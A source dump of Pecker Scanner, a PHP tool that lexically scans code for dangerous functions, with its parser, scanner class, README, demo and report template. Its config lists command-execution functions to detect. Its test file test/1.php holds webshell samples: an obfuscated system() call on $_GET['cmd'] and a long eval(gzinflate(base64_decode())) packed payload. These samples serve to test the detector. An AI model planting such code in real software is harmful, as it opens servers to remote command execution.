| $state = self::$yygoto[$yyp]; 1076 | } else { 1077 | $state = self::$yygdefault[$yyn]; 1078 | } 1079 | 1080 | ++$this->stackPos; 1081 | 1082 | $stateStack[$this->stackPos] = $state; 1083 | $this->yyastk[$this->stackPos] = $this->yyval; 1084 | $attributeStack[$this->stackPos] = $startAttributes; 1085 | } else { 1086 | /* error */ 1087 | $expected = array(); 1088 | 1089 | $base = self::$yybase[$state]; 1090 | for ($i = 0; $i < self::TOKEN_MAP_SIZE; ++$i) { 1091 | $n = $base + $i; 1092 | if ($n >= 0 && $n < self::YYLAST && self::$yycheck[$n] == $i 1093 | || $state < self::YY2TBLSTATE 1094 | && ($n = self::$yybase[$state + self::YYNLSTATES] + $i) >= 0 1095 | && $n < self::YYLAST && self::$yycheck[$n] == $i 1096 | ) { 1097 | if (self::$yyaction[$n] != self::YYUNEXPECTED) { 1098 | if (count($expected) == 4) { 1099 | /* Too many expected tokens */ 1100 | $expected = array(); 1101 | break; 1102 | } 1103 | $expected[] = self::$terminals[$i]; 1104 | } 1105 | } 1106 | } 1107 | 1108 | $expectedString = ''; 1109 | if ($expected) { 1110 | $expectedString = ', expecting ' . implode(' or ', $expected); 1111 | } 1112 | 1113 | $this->errMsg = 'Syntax error, unexpected ' . self::$terminals[$tokenId] . $expectedString .' at line '.$startAttributes['startLine']; 1114 | return false; 1115 | } 1116 | 1117 | if ($state < self::YYNLSTATES) 1118 | break; 1119 | /* >= YYNLSTATES means shift-and-reduce */ 1120 | $yyn = $state - self::YYNLSTATES; 1121 | } 1122 | } 1123 | return true; 1124 | } 1125 | 1126 | /** 1127 | * get next tokens after a variable,like curly syntax 1128 | * @param int $k 1129 | * @return array 1130 | */ 1131 | public function getVariableToken($k) 1132 | { 1133 | $result = array(); 1134 | $res = ''; 1135 | $fun = ''; 1136 | for ($i=1;;$i++) 1137 | { 1138 | if (isset($this->tokens[$k+$i])) 1139 | { 1140 | if (is_array($this->tokens[$k+$i])) 1141 | { 1142 | $fun .= $this->tokens[$k+$i][1]; 1143 | continue; 1144 | } 1145 | else 1146 | { 1147 | if (in_array($this->tokens[$k+$i],$this->tokensVariable)) 1148 | { 1149 | $res = $this->tokens[$k+$i]; 1150 | break; 1151 | } 1152 | $fun .= $this->tokens[$k+$i]; 1153 | } 1154 | } 1155 | else 1156 | { 1157 | break; 1158 | } 1159 | } 1160 | $result['token'] = $res; 1161 | $result['func'] = $fun; 1162 | $result['key'] = $i-1; 1163 | return $result; 1164 | } 1165 | 1166 | /** 1167 | * get next tokens of $k without WHITESPACE 1168 | * @param int $k 1169 | * @return string 1170 | */ 1171 | public function getNextToken($k) 1172 | { 1173 | $res = ''; 1174 | for ($i=1;;$i++) 1175 | { 1176 | if (isset($this->tokens[$k+$i])) 1177 | { 1178 | if (is_array($this->tokens[$k+$i])) 1179 | { 1180 | if (in_array($this->tokens[$k+$i][0],$this->tokensSkip)) 1181 | { 1182 | continue; 1183 | } 1184 | else 1185 | { 1186 | $res = $this->tokens[$k+$i][1]; 1187 | break; 1188 | } 1189 | } 1190 | else 1191 | { 1192 | $res = $this->tokens[$k+$i]; 1193 | break; 1194 | } 1195 | } 1196 | else 1197 | { 1198 | break; 1199 | } 1200 | } 1201 | return $res; 1202 | } 1203 | 1204 | /** 1205 | * get previou token of $k without WHITESPACE 1206 | * @param int $k 1207 | * @return string 1208 | */ 1209 | public function getPreToken ($k) 1210 | { 1211 | $res = ''; 1212 | for ($i = 1; $k - $i >= 0; $i ++) 1213 | { 1214 | if (isset($this->tokens[$k - $i])) 1215 | { 1216 | if (is_array($this->tokens[$k - $i])) 1217 | { 1218 | if (in_array($this->tokens[$k-$i][0],$this->tokensSkip)) 1219 | { 1220 | continue; 1221 | } else 1222 | { 1223 | $res = $this->tokens[$k - $i][1]; 1224 | break; 1225 | } 1226 | } else 1227 | { 1228 | $res = $this->tokens[$k - $i]; 1229 | break; 1230 | } 1231 | } else 1232 | { 1233 | break; 1234 | } 1235 | } 1236 | return $res; 1237 | } 1238 | 1239 | /** 1240 | * get a piece token of the token after $k,and end with ; OR T_CLOSE_TAG 1241 | * @param int $k 1242 | * @return string 1243 | */ 1244 | public function getFilepathToken($k) 1245 | { 1246 | $str = ''; 1247 | for ($i = 1;; $i ++) 1248 | { 1249 | if (isset($this->tokens[$k + $i])) 1250 | { 1251 | if (is_array($this->tokens[$k + $i])) 1252 | { 1253 | if ($this->tokens[$k + $i][0] == T_WHITESPACE) 1254 | { 1255 | continue; 1256 | } elseif($this->tokens[$k + $i][0] == T_CLOSE_TAG) 1257 | { 1258 | break; 1259 | } 1260 | else 1261 | { 1262 | $str .= trim(trim($this->tokens[$k + $i][1],'"'),'\''); 1263 | } 1264 | } else 1265 | { 1266 | if ($this->tokens[$k + $i] == ';' || ($this->tokens[$k + $i] == ')' && $this->getNextToken($k + $i) == ';') || ($this->tokens[$k + $i] == ')' && $this->getNextToken($k + $i) == '.')) 1267 | { 1268 | break; 1269 | } 1270 | elseif ($this->tokens[$k + $i] == '.') 1271 | { 1272 | $str = ''; 1273 | continue; 1274 | } 1275 | $str .= $this->tokens[$k + $i]; 1276 | } 1277 | } else 1278 | { 1279 | break; 1280 | } 1281 | } 1282 | return $str; 1283 | } 1284 | 1285 | /** 1286 | * get all token from $k to END TOKEN. (T_CLOSE_TAG or ;) 1287 | * @param int $k 1288 | * @return string 1289 | */ 1290 | public function getPieceTokenAll ($k) 1291 | { 1292 | $str = $str1 = ''; 1293 | $l = $r = 0; 1294 | for ($i = 1;; $i ++) 1295 | { 1296 | if (isset($this->tokens[$k + $i])) 1297 | { 1298 | if (is_array($this->tokens[$k + $i])) 1299 | { 1300 | if (in_array($this->tokens[$k + $i][0],array(T_CLOSE_TAG))|| ($l != 0 && $l == $r)) 1301 | { 1302 | break; 1303 | } 1304 | if (!in_array($this->tokens[$k + $i][0],array(T_WHITESPACE,T_COMMENT,T_DOC_COMMENT,T_INLINE_HTML,T_ECHO,T_ENCAPSED_AND_WHITESPACE))) 1305 | { 1306 | $str1 .= $this->tokens[$k + $i][1]; 1307 | } 1308 | $str .= $this->tokens[$k + $i][1]; 1309 | } 1310 | else 1311 | { 1312 | if ($this->tokens[$k + $i] == ';' || ($l != 0 && $l == $r)) 1313 | { 1314 | break; 1315 | } 1316 | if ($this->tokens[$k + $i] == '(') 1317 | { 1318 | $l ++; 1319 | } 1320 | if ($this->tokens[$k + $i] == ')') 1321 | { 1322 | $r ++; 1323 | } 1324 | $str .= $this->tokens[$k + $i]; 1325 | $str1 .= $this->tokens[$k + $i]; 1326 | } 1327 | } 1328 | else 1329 | { 1330 | break; 1331 | } 1332 | } 1333 | return array('more'=>$str,'less'=>$str1); 1334 | } 1335 | 1336 | /** 1337 | * get all tokens 1338 | * @return array 1339 | */ 1340 | public function getTokens() 1341 | { 1342 | return $this->tokens; 1343 | } 1344 | 1345 | /** 1346 | * get error messages 1347 | * @return string 1348 | */ 1349 | public function getErrmsg() 1350 | { 1351 | return $this->errMsg; 1352 | } 1353 | } 1354 | ?> -------------------------------------------------------------------------------- /Pecker/Scanner.php: -------------------------------------------------------------------------------- 1 | 15 | * @package Scanner 16 | * @version $Id: Scanner.php 31 2014-05-27 08:09:52Z cfc4n $ 17 | */ 18 | class Pecker_Scanner 19 | { 20 | private $extend = array(); 21 | private $parser; 22 | private $report; 23 | private $function; 24 | private $path; 25 | private $dropdir = array(); 26 | 27 | function __construct() 28 | { 29 | $this->parser = new Pecker_Parser(new Pecker_Lexer()); 30 | $this->report = new Pecker_Loger(); 31 | $this->extend['php'] = true; 32 | } 33 | 34 | /** 35 | * set expansion name 36 | * @param array $extend 37 | */ 38 | public function setExtend(array $extend) 39 | { 40 | foreach ($extend as $v) 41 | { 42 | $this->extend[trim(trim($v),'.')] = true; 43 | } 44 | if (!isset($this->extend['php'])) 45 | { 46 | $this->extend['php'] = true; 47 | } 48 | } 49 | 50 | /** 51 | * set directory path 52 | * @param unknown $path 53 | * @throws Exception 54 | */ 55 | public function setPath($path) 56 | { 57 | if (substr($path,-1) == '/' || substr($path,-1) == '\\') 58 | { 59 | $path = substr($path, 0,-1); 60 | } 61 | if (!is_dir($path)) 62 | { 63 | throw new Exception($path.' is not existing directory.'); 64 | } 65 | $this->path = $path; 66 | } 67 | 68 | /** 69 | * set functions of check list 70 | * @param array $function 71 | */ 72 | public function setFunction(array $function) 73 | { 74 | foreach ($function as $fun) 75 | { 76 | $this->function[trim($fun)] = true; 77 | } 78 | if(!isset($this->function['eval'])) 79 | { 80 | $this->function['eval'] = true; 81 | } 82 | } 83 | 84 | /** 85 | * main function 86 | */ 87 | public function run () 88 | { 89 | $this->scanDir($this->path); 90 | } 91 | 92 | /** 93 | * scan directorys 94 | * @param string $dir 95 | * @throws Exception 96 | */ 97 | private function scanDir ($dir) 98 | { 99 | if(($handle = opendir($dir))!== false) { 100 | while (false !== ($file = readdir($handle))) { 101 | if ($file != '.' && $file != '..') 102 | { 103 | if (is_dir($dir.DIRECTORY_SEPARATOR.$file)) 104 | { 105 | if (!in_array($dir.DIRECTORY_SEPARATOR.$file,$this->dropdir)) 106 | { 107 | $this->scanDir($dir.DIRECTORY_SEPARATOR.$file); 108 | } 109 | } 110 | elseif (is_file($dir.DIRECTORY_SEPARATOR.$file) && $file != '.svn') 111 | { 112 | $arrFileinfo = pathinfo($dir.DIRECTORY_SEPARATOR.$file); 113 | if (isset($arrFileinfo['extension']) && isset($this->extend[$arrFileinfo['extension']])) 114 | { 115 | if (!in_array($dir.DIRECTORY_SEPARATOR.$file,$this->dropdir)) 116 | { 117 | $this->scanFile($dir.DIRECTORY_SEPARATOR.$file); 118 | } 119 | } 120 | } 121 | } 122 | } 123 | closedir($handle); 124 | } 125 | else 126 | { 127 | throw new Exception('Can\'t to read this dir '.$dir); 128 | } 129 | } 130 | 131 | /** 132 | * scan files 133 | * @param string $file 134 | * @return boolean 135 | */ 136 | private function scanFile($file) 137 | { 138 | $this->report->setFile($file); 139 | $bRS = $this->parser->parse(file_get_contents($file)); 140 | if(false === $bRS) 141 | { 142 | $this->report->errorLog($this->parser->getErrmsg()); 143 | return false; 144 | } 145 | $this->checkTokens($this->parser->getTokens()); 146 | } 147 | 148 | /** 149 | * scan code string 150 | * @param string $code 151 | * @return boolean 152 | */ 153 | public function ScanCode($code) 154 | { 155 | $this->report->setFile('temp'); 156 | $bRS = $this->parser->parse($code); 157 | if(false === $bRS) 158 | { 159 | $this->report->errorLog($this->parser->getErrmsg()); 160 | return false; 161 | } 162 | $this->checkTokens($this->parser->getTokens()); 163 | } 164 | 165 | /** 166 | * check dangerous functions 167 | * @param array $tokens 168 | */ 169 | private function checkTokens(array $tokens) 170 | { 171 | $i = 0; 172 | $curly = false; 173 | $curly_str = ''; 174 | $curly_num = 0; 175 | foreach ($tokens as $k => $token) 176 | { 177 | if (!$curly && is_array($token)) 178 | { 179 | switch ($token[0]) 180 | { 181 | case T_EVAL: 182 | $this->report->catchLog($token[1],$token[2],$this->parser->getPieceTokenAll($k)); 183 | break; 184 | case T_FUNCTION: 185 | if (isset($this->function[$token[1]])) 186 | { 187 | $this->report->catchLog($token[1],$token[2],$this->parser->getPieceTokenAll($k)); 188 | } 189 | break; 190 | case T_VARIABLE: 191 | $ntoken = $this->parser->getNextToken($k); 192 | $ptoken = $this->parser->getPreToken($k); 193 | if ($ntoken === '(' && $ptoken != '->' && $ptoken !== '::' && $ptoken !== 'function' && $ptoken !== 'new') 194 | { 195 | $this->report->catchLog($token[1], $token[2],$this->parser->getPieceTokenAll($k)); 196 | } 197 | elseif ($ntoken === '{' || $ntoken === '[' ) 198 | { 199 | $nt = $this->parser->getVariableToken($k); 200 | if ($nt['token'] === '(') 201 | { 202 | $this->report->catchLog($token[1].$nt['func'], $token[2],$this->parser->getPieceTokenAll($nt['key']+$k)); 203 | } 204 | } 205 | break; 206 | case T_STRING: 207 | if (isset($this->function[$token[1]])) 208 | { 209 | $ntoken = $this->parser->getNextToken($k); 210 | $ptoken = $this->parser->getPreToken($k); 211 | if ($ntoken === '(' && $ptoken != '->' && $ptoken != '::' && $ptoken != 'function') 212 | { 213 | if($token[1] == 'preg_replace') 214 | { 215 | $strRegex = $this->parser->getNextToken($k+1); 216 | if($this->_hasCallback($strRegex)) 217 | { 218 | $this->report->catchLog($token[1], $token[2],$this->parser->getPieceTokenAll($k)); 219 | } 220 | } 221 | else 222 | { 223 | $this->report->catchLog($token[1], $token[2],$this->parser->getPieceTokenAll($k)); 224 | } 225 | } 226 | } 227 | break; 228 | case T_INCLUDE: 229 | case T_INCLUDE_ONCE: 230 | case T_REQUIRE: 231 | case T_REQUIRE_ONCE: 232 | if (isset($this->function['include']) || isset($this->function['include_once']) || isset($this->function['require']) || isset($this->function['require_once'])) 233 | { 234 | $infile = $this->parser->getFilepathToken($k); 235 | $fileinfo = pathinfo($infile); 236 | if (isset($fileinfo['extension']) && !isset($this->extend[$fileinfo['extension']])) 237 | { 238 | $this->report->catchLog($token[1], $token[2],$this->parser->getPieceTokenAll($k)); 239 | } 240 | } 241 | break; 242 | default: 243 | } 244 | } 245 | elseif ($curly) 246 | { 247 | //Complex (curly) syntax 248 | if (!is_array($token)) 249 | { 250 | if ($token === '{') 251 | { 252 | $curly_str .= '{'; 253 | $curly_num ++; 254 | } 255 | elseif($token === '}') 256 | { 257 | $curly_str .= '}'; 258 | $curly_num --; 259 | } 260 | } 261 | else 262 | { 263 | $curly_str .= $token[1]; 264 | } 265 | if ($curly_num == 0) 266 | { 267 | $curly = false; 268 | $this->report->catchLog($curly_str, 0,$this->parser->getPieceTokenAll($k)); 269 | } 270 | } 271 | elseif($token === '$') 272 | { 273 | /** 274 | * Zend_language_scanner.c : yy56 、yy61 275 | * 276 | $nt = $this->parser->getNextToken($k); 277 | switch ($nt) 278 | { 279 | case '$': 280 | break; 281 | case '\\': 282 | break; 283 | case '{': 284 | break; 285 | default: 286 | } 287 | */ 288 | $nt = $this->parser->getVariableToken($k); 289 | if ($nt['token'] === '{') 290 | { 291 | $curly = true; 292 | $curly_str = '$'; 293 | $curly_num = 0; 294 | } 295 | } 296 | } 297 | } 298 | 299 | /** 300 | * get results 301 | * @return Ambigous 302 | */ 303 | public function getReport() 304 | { 305 | return $this->report->getReport(); 306 | } 307 | 308 | /** 309 | * grep modifier 'e' in regex string 310 | * @param string $str 311 | * @return boolean 312 | */ 313 | private function _hasCallback($str) 314 | { 315 | $str = trim($str); 316 | if (substr($str,0,1) == '$') 317 | { 318 | return true; 319 | } 320 | $a = subStr(subStr($str,1),0,-1); 321 | $start_delimiter = $end_delimiter = $a{0}; 322 | $strabc = '([{< )]}>'; 323 | if (false !== ($num = strpos($strabc,$start_delimiter))) 324 | { 325 | $end_delimiter = $strabc{$num+5}; 326 | } 327 | if (false !== ($num1 = strrpos($str,$end_delimiter))) 328 | { 329 | $modifiers = substr($str,$num1+1); 330 | if (false !== strpos($modifiers,'e')) 331 | { 332 | return true; 333 | } 334 | } 335 | return false; 336 | } 337 | } 338 | 339 | ?> 340 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Pecker Scanner 2 | ====== 3 | 4 | A scanner named pecker, written in php,It can check dangerous functions with lexical analysis. 5 | 6 | Use: 7 | ===== 8 | Config: 9 | ```php 10 | $config = array( 11 | 'scandir' => dirname(__FILE__), 12 | 'extend' => array('php','inc','php5'), 13 | 'function' => array('exec','system','create_function','passthru','shell_exec','proc_open','popen','curl_exec','parse_ini_file','show_source','include','preg_replace'), 14 | ); 15 | ``` 16 | 17 | Main: 18 | ```php 19 | $scaner = new Pecker_Scanner(); 20 | $scaner->setPath($config['scandir']); // set directory to scan 21 | $scaner->setExtend($config['extend']); 22 | $scaner->setFunction($config['function']); 23 | $scaner->run(); 24 | $result = $scaner->getReport(); 25 | ``` 26 | 27 | Result: 28 | ```php 29 | Array 30 | ( 31 | [Pecker\test\1.php] => Array 32 | ( 33 | [parser] => 1 34 | [message] => 35 | [function] => Array 36 | ( 37 | [eval] => Array 38 | ( 39 | [0] => Array 40 | ( 41 | [line] => 23 42 | [code] => ( //get it 43 | gzinflate ( $str ($str1))) 44 | ) 45 | 46 | [1] => Array 47 | ( 48 | [line] => 35 49 | [code] => ('$str = time();') 50 | ) 51 | 52 | ) 53 | 54 | [exec] => Array 55 | ( 56 | [0] => Array 57 | ( 58 | [line] => 25 59 | [code] => ('dir') 60 | ) 61 | 62 | [1] => Array 63 | ( 64 | [line] => 36 65 | [code] => ('dir') 66 | ) 67 | 68 | ) 69 | 70 | ) 71 | 72 | ) 73 | 74 | [Pecker\test\111.php] => Array 75 | ( 76 | [parser] => 1 77 | [message] => 78 | [function] => Array 79 | ( 80 | ) 81 | 82 | ) 83 | 84 | [Pecker\test\3.php] => Array 85 | ( 86 | [parser] => 1 87 | [message] => 88 | [function] => Array 89 | ( 90 | ) 91 | 92 | ) 93 | 94 | ) 95 | 96 | ``` 97 | 98 | Info 99 | ===== 100 | + Home Page:[http://www.cnxct.com/pecker-scanner/][1] 101 | + WeiBo:[http://weibo.com/n/CFC4N][2] 102 | 103 | Reference 104 | ===== 105 | + [PHPPHP][3] 106 | + [PHP-Parser][4] 107 | 108 | Other 109 | ===== 110 | + [Pecker Scanner Server][5] 111 | 112 | [1]:http://www.cnxct.com/pecker-scanner/ 113 | [2]:http://weibo.com/n/CFC4N 114 | [3]:https://github.com/ircmaxell/PHPPHP 115 | [4]:https://github.com/nikic/PHP-Parser 116 | [5]:https://github.com/cfc4n/pecker-server 117 | -------------------------------------------------------------------------------- /index.php: -------------------------------------------------------------------------------- 1 | 15 | * @package demo 16 | * @version $Id: index.php 28 2014-03-03 03:30:23Z cfc4n $ 17 | */ 18 | set_time_limit(0); 19 | define('MAX_STRLEN', 500); //max length value of hash string 20 | 21 | 22 | //require dirname(__FILE__) . '/Pecker/Autoloader.php'; 23 | //Pecker_Autoloader::register(); //register autoloader 24 | 25 | // OR with lite 26 | 27 | require dirname(__FILE__) .'/PeckerLite/PeckerScanner.lite.php'; 28 | 29 | 30 | $config = array( 31 | 'scandir' => dirname(__FILE__).DIRECTORY_SEPARATOR.'test', 32 | 'extend' => array('php','inc','php5'), 33 | 'function' => array('exec','system','create_function','passthru','shell_exec','proc_open','popen','copy','curl_exec','parse_ini_file','show_source','assert','file_put_contents','call_user_func_array','call_user_func','preg_replace','include'), 34 | ); 35 | 36 | try { 37 | $scaner = new Pecker_Scanner(); 38 | $scaner->setPath($config['scandir']); // set directory to scan 39 | $scaner->setExtend($config['extend']); 40 | $scaner->setFunction($config['function']); 41 | $scaner->run(); 42 | $result = $scaner->getReport(); 43 | 44 | $html = ''; 45 | //result of demo for show 46 | foreach ($result as $k => $v) 47 | { 48 | if ($v['parser'] === false) 49 | { 50 | $html .= ''.str_replace($config['scandir'], '', $k).' - - '.$v['message'].''; 51 | } 52 | else 53 | { 54 | $n = count($v['function']); 55 | if ( $n > 0) 56 | { 57 | $rowspan = false; 58 | foreach ($v['function'] as $func => $line) 59 | { 60 | if (!$rowspan) 61 | { 62 | $html .=''.str_replace($config['scandir'], '', $k).''; 63 | $rowspan = true; 64 | } 65 | else 66 | { 67 | $html .=''; 68 | } 69 | $html1 = ''; 70 | foreach ($line as $c) 71 | { 72 | $html1 .= 'line '.$c['line'].' :'.''.$func.' '; 73 | $strLess = base64_encode($func.$c['codeless']); 74 | if (strlen($strLess) > MAX_STRLEN) 75 | { 76 | $html1 .= htmlspecialchars(substr($c['codemore'],0,50)).'
'; 77 | } 78 | else 79 | { 80 | $html1 .= htmlspecialchars(substr($c['codemore'],0,50)).'
'; 81 | } 82 | } 83 | $html .=''.$func.' '.$html1.' - '; 84 | } 85 | } 86 | } 87 | } 88 | if ($html == '') 89 | { 90 | $html = 'Congratulations,It is very safe...'; 91 | } 92 | $report = file_get_contents('template.html'); 93 | $report = str_replace('{PATH}', ''.$config['scandir'].'', $report); 94 | $report = str_replace('{EXTEND}', ''.implode(',',$config['extend']).'', $report); 95 | $report = str_replace('{FUNCTION}',''.implode(', ',$config['function']).'', $report); 96 | $report = str_replace('{RESULT}', $html, $report); 97 | $filename = 'report_'.date('YmdHis').'.html'; 98 | file_put_contents($filename, $report); 99 | echo 'Completed,View report.'; 100 | } 101 | catch (Exception $e) 102 | { 103 | print_r($e); 104 | } -------------------------------------------------------------------------------- /template.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Report by Pecker Scanner 5 | 23 | 24 | 25 | 26 |
27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | {RESULT} 41 | 42 |
Scan path: {PATH}
extensions:{EXTEND}
keywords:{FUNCTION}
File NameFunctionInformationRemark
43 | 44 |
45 | Confirm with Pecker Scanner server 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /test/1.php: -------------------------------------------------------------------------------- 1 | 15 | * @package demo 16 | * @version $Id: 1.php 31 2014-05-27 08:09:52Z cfc4n $ 17 | */ 18 | 19 | $str = 'base64_decode'; 20 | $str1 = '40pNzshXSFCJD3INDHUNDo\'"\"lOjE2wtlawt+MCAA== 21 | eval (gzinflate(base64_decode("test")) '; //pass 22 | file('2'.php); 23 | (require '1.dat').'.php'; 24 | eval( //get it 25 | gzinflate ( $str ($str1))); //get it 26 | exec('dir'); //get it 27 | class a 28 | { 29 | function exec() //pass 30 | { 31 | eval('$str = time();'); //get it 32 | exec('dir'); //get it 33 | } 34 | } 35 | include dirname(__FILE__)."/1"; //get it 36 | include_once "/2.php"; //pass 37 | require "/3.jpg"; //get it 38 | require_once dirname(__FILE__)."/4.inc"; //pass 39 | require_once("config.cache.inc.php"); //pass 40 | $func = "s"."ystem"; 41 | $func($_GET['cmd']); 42 | preg_replace('/test/ies', 'test', $func); //@todo 43 | preg_replace('/test/is', 'test', $func); //@todo 44 | //eval($_GET['test']) //pass 45 | system/**/("whoami"); //get it 46 | assert('phpinfo()'); //get it 47 | $str1 = "$func({$_GET['cmd']})\r\n"; //pass 48 | $ct = 'a'; 49 | $instance = new $ct ( ); //pass 50 | 51 | /** 52 | * test for cloud services 53 | */ 54 | eval(gzinflate(base64_decode('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